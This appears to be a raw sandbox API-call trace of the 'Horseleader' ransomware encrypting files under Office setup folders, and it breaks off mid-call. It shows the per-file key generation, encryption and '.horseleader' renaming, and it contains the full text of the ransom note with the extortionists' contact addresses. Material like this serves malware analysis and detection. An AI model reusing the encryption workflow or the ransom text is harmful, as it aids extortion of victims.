[0244.725] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.725] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.725] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8728670, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf5db14d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="PowerPointMUI.XML", cAlternateFileName="POWERP~1.XML")) returned 1 [0244.725] lstrcmpiW (lpString1="PowerPointMUI.XML", lpString2="Windows") returned -1 [0244.725] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 118 [0244.725] StrStrIW (lpFirst="PowerPointMUI.XML", lpSrch=".horseleader") returned 0x0 [0244.725] lstrcmpW (lpString1="PowerPointMUI.XML", lpString2="#Decrypt#.txt") returned 1 [0244.725] lstrcmpW (lpString1="PowerPointMUI.XML", lpString2="_uninstalling_.png") returned 1 [0244.725] lstrlenW (lpString=".testttjffg") returned 11 [0244.725] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML", lpSrch=".testttjffg") returned 0x0 [0244.725] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.725] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.726] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.726] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 118 [0244.726] StrStrW (lpFirst="PowerPointMUI.XML", lpSrch=".txt") returned 0x0 [0244.726] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=1450) returned 1 [0244.726] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5aa, lpOverlapped=0x0) returned 1 [0244.728] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffa56, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.728] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5aa, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5aa, lpOverlapped=0x0) returned 1 [0244.729] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.729] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.729] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.729] CloseHandle (hObject=0x15c) returned 1 [0244.729] GetProcessHeap () returned 0x780000 [0244.729] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.729] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML.horseleader") returned 130 [0244.729] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml.horseleader")) returned 1 [0244.730] GetProcessHeap () returned 0x780000 [0244.730] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.730] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf5e95d10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x75e, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0244.731] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0244.731] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 110 [0244.731] StrStrIW (lpFirst="SETUP.XML", lpSrch=".horseleader") returned 0x0 [0244.731] lstrcmpW (lpString1="SETUP.XML", lpString2="#Decrypt#.txt") returned 1 [0244.731] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0244.731] lstrlenW (lpString=".testttjffg") returned 11 [0244.731] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML", lpSrch=".testttjffg") returned 0x0 [0244.731] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.731] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.731] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.733] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 110 [0244.733] StrStrW (lpFirst="SETUP.XML", lpSrch=".txt") returned 0x0 [0244.733] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=1886) returned 1 [0244.734] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x75e, lpOverlapped=0x0) returned 1 [0244.739] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffff8a2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.739] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x75e, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x75e, lpOverlapped=0x0) returned 1 [0244.740] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.740] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.740] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.740] CloseHandle (hObject=0x15c) returned 1 [0244.741] GetProcessHeap () returned 0x780000 [0244.741] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.741] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML.horseleader") returned 122 [0244.741] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml.horseleader")) returned 1 [0244.742] GetProcessHeap () returned 0x780000 [0244.742] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.742] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf5e95d10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x75e, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="SETUP.XML", cAlternateFileName="")) returned 0 [0244.742] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0244.742] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\#Decrypt#.txt") returned 114 [0244.742] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.746] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0244.746] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0244.747] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0244.747] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0244.747] CloseHandle (hObject=0x1a4) returned 1 [0244.747] GetProcessHeap () returned 0x780000 [0244.747] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.748] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe2e8f80, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xbec48620, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbec48620, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="PRJPROR", cAlternateFileName="")) returned 1 [0244.748] lstrcmpiW (lpString1="PRJPROR", lpString2="Windows") returned -1 [0244.748] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR") returned 91 [0244.748] lstrcmpW (lpString1="PRJPROR", lpString2=".") returned 1 [0244.748] lstrcmpW (lpString1="PRJPROR", lpString2="..") returned 1 [0244.748] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0244.748] GetProcessHeap () returned 0x780000 [0244.748] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.748] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\*") returned 93 [0244.748] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe2e8f80, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xbec48620, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbec48620, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0244.749] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.749] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\.") returned 93 [0244.749] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.749] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe2e8f80, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xbec48620, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbec48620, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="..", cAlternateFileName="")) returned 1 [0244.749] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.749] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\..") returned 94 [0244.749] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.749] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.749] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa60fd8f0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xbe2e8f80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa60fd8f0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x1915, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="PrjProrWW.XML", cAlternateFileName="PRJPRO~1.XML")) returned 1 [0244.749] lstrcmpiW (lpString1="PrjProrWW.XML", lpString2="Windows") returned -1 [0244.749] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 105 [0244.749] StrStrIW (lpFirst="PrjProrWW.XML", lpSrch=".horseleader") returned 0x0 [0244.749] lstrcmpW (lpString1="PrjProrWW.XML", lpString2="#Decrypt#.txt") returned 1 [0244.749] lstrcmpW (lpString1="PrjProrWW.XML", lpString2="_uninstalling_.png") returned 1 [0244.749] lstrlenW (lpString=".testttjffg") returned 11 [0244.750] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML", lpSrch=".testttjffg") returned 0x0 [0244.750] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.750] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.750] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.750] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 105 [0244.750] StrStrW (lpFirst="PrjProrWW.XML", lpSrch=".txt") returned 0x0 [0244.750] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=6421) returned 1 [0244.751] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x1915, lpOverlapped=0x0) returned 1 [0244.753] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffe6eb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.753] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x1915, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x1915, lpOverlapped=0x0) returned 1 [0244.753] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.753] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.754] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.754] CloseHandle (hObject=0x15c) returned 1 [0244.754] GetProcessHeap () returned 0x780000 [0244.754] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.754] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML.horseleader") returned 117 [0244.754] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml.horseleader")) returned 1 [0244.755] GetProcessHeap () returned 0x780000 [0244.755] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.755] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c227b0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xbec48620, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c227b0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x412b, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0244.755] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0244.755] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 101 [0244.755] StrStrIW (lpFirst="SETUP.XML", lpSrch=".horseleader") returned 0x0 [0244.755] lstrcmpW (lpString1="SETUP.XML", lpString2="#Decrypt#.txt") returned 1 [0244.755] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0244.755] lstrlenW (lpString=".testttjffg") returned 11 [0244.755] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML", lpSrch=".testttjffg") returned 0x0 [0244.755] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.755] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.756] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 